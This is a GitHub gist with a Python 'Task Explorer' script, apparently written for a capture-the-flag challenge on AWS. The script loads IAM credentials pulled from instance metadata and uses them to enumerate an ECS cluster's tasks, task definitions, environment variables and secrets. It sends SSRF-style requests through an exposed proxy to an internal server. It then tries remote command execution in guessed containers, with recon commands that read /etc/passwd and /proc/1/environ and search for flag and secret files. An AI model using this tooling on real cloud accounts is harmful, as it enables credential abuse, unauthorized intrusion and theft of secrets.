Created
August 5, 2025 09:37
-
-
Save lawbyte/18fcc57ffd484a70cd43084a01c7cdd2 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Task Explorer | |
| Focuses on exploring the specific running task we discovered | |
| """ | |
| import boto3 | |
| import json | |
| import requests | |
| from botocore.exceptions import ClientError | |
| def load_credentials(): | |
| try: | |
| with open('aws_metadata_extraction.json', 'r') as f: | |
| data = json.load(f) | |
| if 'iam_credentials_container-shii-3acbce43cb4108bae471985d0ee5d060' in data['metadata']: | |
| creds = data['metadata']['iam_credentials_container-shii-3acbce43cb4108bae471985d0ee5d060'] | |
| return { | |
| 'aws_access_key_id': creds['AccessKeyId'], | |
| 'aws_secret_access_key': creds['SecretAccessKey'], | |
| 'aws_session_token': creds['Token'], | |
| 'region_name': 'ap-southeast-1' | |
| } | |
| except Exception as e: | |
| print(f"Error loading credentials: {e}") | |
| return None | |
| def explore_running_task(): | |
| """Explore the specific running task we found""" | |
| credentials = load_credentials() | |
| if not credentials: | |
| print("[-] Failed to load credentials") | |
| return | |
| print("[+] Loaded AWS credentials") | |
| # Create ECS client | |
| try: | |
| ecs_client = boto3.client('ecs', **credentials) | |
| print("[+] Created ECS client successfully") | |
| except Exception as e: | |
| print(f"[-] Failed to create ECS client: {e}") | |
| return | |
| cluster_arn = "arn:aws:ecs:ap-southeast-1:888751817624:cluster/almost-hehehe-asbfkasfj" | |
| task_arn = "arn:aws:ecs:ap-southeast-1:888751817624:task/almost-hehehe-asbfkasfj/6cd0a262e6a5484ca776826815f1cd33" | |
| print(f"\n[+] Exploring specific task: {task_arn}") | |
| print("=" * 80) | |
| # Get detailed task information | |
| try: | |
| response = ecs_client.describe_tasks( | |
| cluster=cluster_arn, | |
| tasks=[task_arn] | |
| ) | |
| if response['tasks']: | |
| task = response['tasks'][0] | |
| print(f"\n[+] Task Details:") | |
| print(f" Task ARN: {task['taskArn']}") | |
| print(f" Status: {task['lastStatus']}") | |
| print(f" Desired Status: {task['desiredStatus']}") | |
| print(f" Task Definition: {task['taskDefinitionArn']}") | |
| print(f" Started At: {task.get('startedAt', 'N/A')}") | |
| print(f" Stopped At: {task.get('stoppedAt', 'N/A')}") | |
| print(f" Stopped Reason: {task.get('stoppedReason', 'N/A')}") | |
| # Check for containers | |
| if 'containers' in task: | |
| print(f"\n[+] Containers:") | |
| for container in task['containers']: | |
| print(f" Container: {container['name']}") | |
| print(f" Status: {container['lastStatus']}") | |
| print(f" Exit Code: {container.get('exitCode', 'N/A')}") | |
| print(f" Reason: {container.get('reason', 'N/A')}") | |
| # Check network interfaces | |
| if 'networkInterfaces' in container: | |
| for net_if in container['networkInterfaces']: | |
| print(f" Private IP: {net_if.get('privateIpv4Address', 'N/A')}") | |
| print(f" Public IP: {net_if.get('publicIpv4Address', 'N/A')}") | |
| print(f" Subnet ID: {net_if.get('subnetId', 'N/A')}") | |
| print(f" Security Groups: {net_if.get('securityGroups', [])}") | |
| # Check for port mappings | |
| if 'portMappings' in container: | |
| print(f" Port Mappings:") | |
| for port_map in container['portMappings']: | |
| print(f" {port_map.get('containerPort', 'N/A')} -> {port_map.get('hostPort', 'N/A')}") | |
| # Check for environment variables | |
| if 'environment' in container: | |
| print(f" Environment Variables:") | |
| for env in container['environment']: | |
| print(f" {env['name']}: {env['value']}") | |
| # Check for secrets | |
| if 'secrets' in container: | |
| print(f" Secrets:") | |
| for secret in container['secrets']: | |
| print(f" {secret['name']}: {secret['valueFrom']}") | |
| # Check for overrides | |
| if 'overrides' in task: | |
| print(f"\n[+] Task Overrides:") | |
| overrides = task['overrides'] | |
| if 'containerOverrides' in overrides: | |
| for container_override in overrides['containerOverrides']: | |
| print(f" Container: {container_override.get('name', 'N/A')}") | |
| if 'environment' in container_override: | |
| for env in container_override['environment']: | |
| print(f" {env['name']}: {env['value']}") | |
| else: | |
| print("[-] No task details found") | |
| except ClientError as e: | |
| print(f"[-] Error getting task details: {e}") | |
| def explore_task_definition(): | |
| """Explore the task definition for this task""" | |
| credentials = load_credentials() | |
| if not credentials: | |
| return | |
| try: | |
| ecs_client = boto3.client('ecs', **credentials) | |
| task_def_arn = "arn:aws:ecs:ap-southeast-1:888751817624:task-definition/secret-task:2" | |
| print(f"\n[+] Exploring task definition: {task_def_arn}") | |
| print("=" * 80) | |
| response = ecs_client.describe_task_definition(taskDefinition=task_def_arn) | |
| task_def = response['taskDefinition'] | |
| print(f"\n[+] Task Definition Details:") | |
| print(f" Family: {task_def['family']}") | |
| print(f" Revision: {task_def['revision']}") | |
| print(f" Status: {task_def['status']}") | |
| print(f" Network Mode: {task_def.get('networkMode', 'N/A')}") | |
| print(f" Requires Compatibilities: {task_def.get('requiresCompatibilities', [])}") | |
| print(f" CPU: {task_def.get('cpu', 'N/A')}") | |
| print(f" Memory: {task_def.get('memory', 'N/A')}") | |
| # Check container definitions | |
| print(f"\n[+] Container Definitions:") | |
| for container_def in task_def['containerDefinitions']: | |
| print(f" Container: {container_def['name']}") | |
| print(f" Image: {container_def['image']}") | |
| print(f" Essential: {container_def.get('essential', 'N/A')}") | |
| print(f" Working Directory: {container_def.get('workingDirectory', 'N/A')}") | |
| print(f" User: {container_def.get('user', 'N/A')}") | |
| # Check for environment variables | |
| if 'environment' in container_def: | |
| print(f" Environment Variables:") | |
| for env in container_def['environment']: | |
| print(f" {env['name']}: {env['value']}") | |
| # Check for secrets | |
| if 'secrets' in container_def: | |
| print(f" Secrets:") | |
| for secret in container_def['secrets']: | |
| print(f" {secret['name']}: {secret['valueFrom']}") | |
| # Check for port mappings | |
| if 'portMappings' in container_def: | |
| print(f" Port Mappings:") | |
| for port_map in container_def['portMappings']: | |
| print(f" {port_map.get('containerPort', 'N/A')} -> {port_map.get('hostPort', 'N/A')}") | |
| # Check for mount points | |
| if 'mountPoints' in container_def: | |
| print(f" Mount Points:") | |
| for mount in container_def['mountPoints']: | |
| print(f" {mount['sourceVolume']} -> {mount['containerPath']}") | |
| # Check for volumes | |
| if 'volumes' in container_def: | |
| print(f" Volumes:") | |
| for volume in container_def['volumes']: | |
| print(f" {volume['name']}: {volume.get('host', {}).get('sourcePath', 'N/A')}") | |
| # Check for log configuration | |
| if 'logConfiguration' in container_def: | |
| print(f" Log Configuration:") | |
| log_config = container_def['logConfiguration'] | |
| print(f" Log Driver: {log_config['logDriver']}") | |
| if 'options' in log_config: | |
| for key, value in log_config['options'].items(): | |
| print(f" {key}: {value}") | |
| # Check for volumes | |
| if 'volumes' in task_def: | |
| print(f"\n[+] Volumes:") | |
| for volume in task_def['volumes']: | |
| print(f" {volume['name']}: {volume.get('host', {}).get('sourcePath', 'N/A')}") | |
| # Check for placement constraints | |
| if 'placementConstraints' in task_def: | |
| print(f"\n[+] Placement Constraints:") | |
| for constraint in task_def['placementConstraints']: | |
| print(f" {constraint['type']}: {constraint.get('expression', 'N/A')}") | |
| # Check for execution role | |
| if 'executionRoleArn' in task_def: | |
| print(f"\n[+] Execution Role: {task_def['executionRoleArn']}") | |
| # Check for task role | |
| if 'taskRoleArn' in task_def: | |
| print(f"\n[+] Task Role: {task_def['taskRoleArn']}") | |
| except ClientError as e: | |
| print(f"[-] Error getting task definition details: {e}") | |
| def test_secret_server_direct(): | |
| """Test direct access to the secret server with more focused approach""" | |
| secret_server_ip = "172.31.8.220" | |
| proxy_url = "http://54.251.250.184:5000/proxy" | |
| print(f"\n[+] Testing direct access to secret-server at {secret_server_ip}") | |
| print("=" * 80) | |
| # Test with different approaches | |
| test_cases = [ | |
| # Basic access | |
| {"url": f"http://{secret_server_ip}:80/", "method": "GET"}, | |
| {"url": f"http://{secret_server_ip}:80", "method": "GET"}, | |
| # Try different ports | |
| {"url": f"http://{secret_server_ip}:8080/", "method": "GET"}, | |
| {"url": f"http://{secret_server_ip}:3000/", "method": "GET"}, | |
| {"url": f"http://{secret_server_ip}:5000/", "method": "GET"}, | |
| # Try with specific headers that might be required | |
| {"url": f"http://{secret_server_ip}:80/", "method": "GET", "headers": "Host: secret-server"}, | |
| {"url": f"http://{secret_server_ip}:80/", "method": "GET", "headers": "X-Forwarded-Host: secret-server"}, | |
| {"url": f"http://{secret_server_ip}:80/", "method": "GET", "headers": "X-Real-IP: 127.0.0.1"}, | |
| # Try with authentication headers | |
| {"url": f"http://{secret_server_ip}:80/", "method": "GET", "headers": "Authorization: Bearer secret"}, | |
| {"url": f"http://{secret_server_ip}:80/", "method": "GET", "headers": "X-API-Key: secret"}, | |
| {"url": f"http://{secret_server_ip}:80/", "method": "GET", "headers": "X-Secret: true"}, | |
| # Try different content types | |
| {"url": f"http://{secret_server_ip}:80/", "method": "GET", "headers": "Accept: application/json"}, | |
| {"url": f"http://{secret_server_ip}:80/", "method": "GET", "headers": "Accept: text/plain"}, | |
| {"url": f"http://{secret_server_ip}:80/", "method": "GET", "headers": "Content-Type: application/json"}, | |
| # Try with query parameters | |
| {"url": f"http://{secret_server_ip}:80/?debug=true", "method": "GET"}, | |
| {"url": f"http://{secret_server_ip}:80/?admin=true", "method": "GET"}, | |
| {"url": f"http://{secret_server_ip}:80/?secret=true", "method": "GET"}, | |
| {"url": f"http://{secret_server_ip}:80/?flag=true", "method": "GET"}, | |
| # Try POST requests with data | |
| {"url": f"http://{secret_server_ip}:80/", "method": "POST", "data": "debug=true"}, | |
| {"url": f"http://{secret_server_ip}:80/", "method": "POST", "data": "admin=true"}, | |
| {"url": f"http://{secret_server_ip}:80/", "method": "POST", "data": "secret=true"}, | |
| {"url": f"http://{secret_server_ip}:80/", "method": "POST", "data": "flag=true"}, | |
| ] | |
| for i, test_case in enumerate(test_cases): | |
| try: | |
| print(f"\n[*] Test case {i+1}: {test_case}") | |
| # Build the request | |
| params = {"url": test_case["url"]} | |
| if "method" in test_case: | |
| params["method"] = test_case["method"] | |
| headers = {} | |
| if "headers" in test_case: | |
| # Parse headers string into dict | |
| header_str = test_case["headers"] | |
| if ":" in header_str: | |
| key, value = header_str.split(":", 1) | |
| headers[key.strip()] = value.strip() | |
| data = None | |
| if "data" in test_case: | |
| data = test_case["data"] | |
| # Make the request | |
| if test_case.get("method") == "POST": | |
| response = requests.post(proxy_url, params=params, headers=headers, data=data, timeout=10) | |
| else: | |
| response = requests.get(proxy_url, params=params, headers=headers, timeout=10) | |
| print(f"[+] Status: {response.status_code}") | |
| print(f"[+] Response length: {len(response.text)}") | |
| if response.text and len(response.text) > 0: | |
| print(f"[+] Response: {response.text[:300]}...") | |
| # Check for potential flags | |
| if "flag" in response.text.lower() or "ctf" in response.text.lower(): | |
| print(f"[!] POTENTIAL FLAG FOUND in test case {i+1}!") | |
| print(f"[!] Full response: {response.text}") | |
| # Check for error details | |
| if "error" in response.text.lower(): | |
| print(f"[*] Error details found: {response.text}") | |
| except Exception as e: | |
| print(f"[-] Error in test case {i+1}: {e}") | |
| def try_container_execution(): | |
| """Try to execute commands in the container using ECS Execute Command""" | |
| credentials = load_credentials() | |
| if not credentials: | |
| return | |
| try: | |
| ecs_client = boto3.client('ecs', **credentials) | |
| cluster_arn = "arn:aws:ecs:ap-southeast-1:888751817624:cluster/almost-hehehe-asbfkasfj" | |
| task_arn = "arn:aws:ecs:ap-southeast-1:888751817624:task/almost-hehehe-asbfkasfj/6cd0a262e6a5484ca776826815f1cd33" | |
| print(f"\n[+] Attempting to execute commands in container...") | |
| print("=" * 80) | |
| # Try different container names | |
| container_names = ['secret-server', 'app', 'web', 'main', 'container'] | |
| commands_to_try = [ | |
| "whoami", | |
| "id", | |
| "pwd", | |
| "ls -la", | |
| "env", | |
| "ps aux", | |
| "netstat -tulpn", | |
| "cat /etc/passwd", | |
| "find / -name '*flag*' 2>/dev/null", | |
| "find / -name '*secret*' 2>/dev/null", | |
| "find / -name '*.txt' 2>/dev/null", | |
| "find / -name '*.json' 2>/dev/null", | |
| "cat /proc/1/cmdline", | |
| "cat /proc/1/environ", | |
| "mount", | |
| "df -h", | |
| "cat /etc/hosts", | |
| "cat /etc/resolv.conf" | |
| ] | |
| for container_name in container_names: | |
| print(f"\n[*] Trying container name: {container_name}") | |
| for cmd in commands_to_try: | |
| try: | |
| print(f"[*] Trying command: {cmd}") | |
| response = ecs_client.execute_command( | |
| cluster=cluster_arn, | |
| task=task_arn, | |
| container=container_name, | |
| command=cmd, | |
| interactive=False | |
| ) | |
| print(f"[+] Command executed successfully: {response}") | |
| except ClientError as e: | |
| if 'AccessDenied' in str(e): | |
| print(f"[-] Access denied for command: {cmd}") | |
| elif 'InvalidParameterException' in str(e): | |
| print(f"[-] Invalid parameter for command: {cmd}") | |
| elif 'ContainerNotFoundException' in str(e): | |
| print(f"[-] Container {container_name} not found") | |
| break | |
| else: | |
| print(f"[-] Error executing command '{cmd}': {e}") | |
| except ClientError as e: | |
| print(f"[-] Error attempting command execution: {e}") | |
| if __name__ == "__main__": | |
| print("Task Explorer") | |
| print("=" * 50) | |
| explore_running_task() | |
| explore_task_definition() | |
| test_secret_server_direct() | |
| try_container_execution() | |
| print("\n[+] Task exploration complete!") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment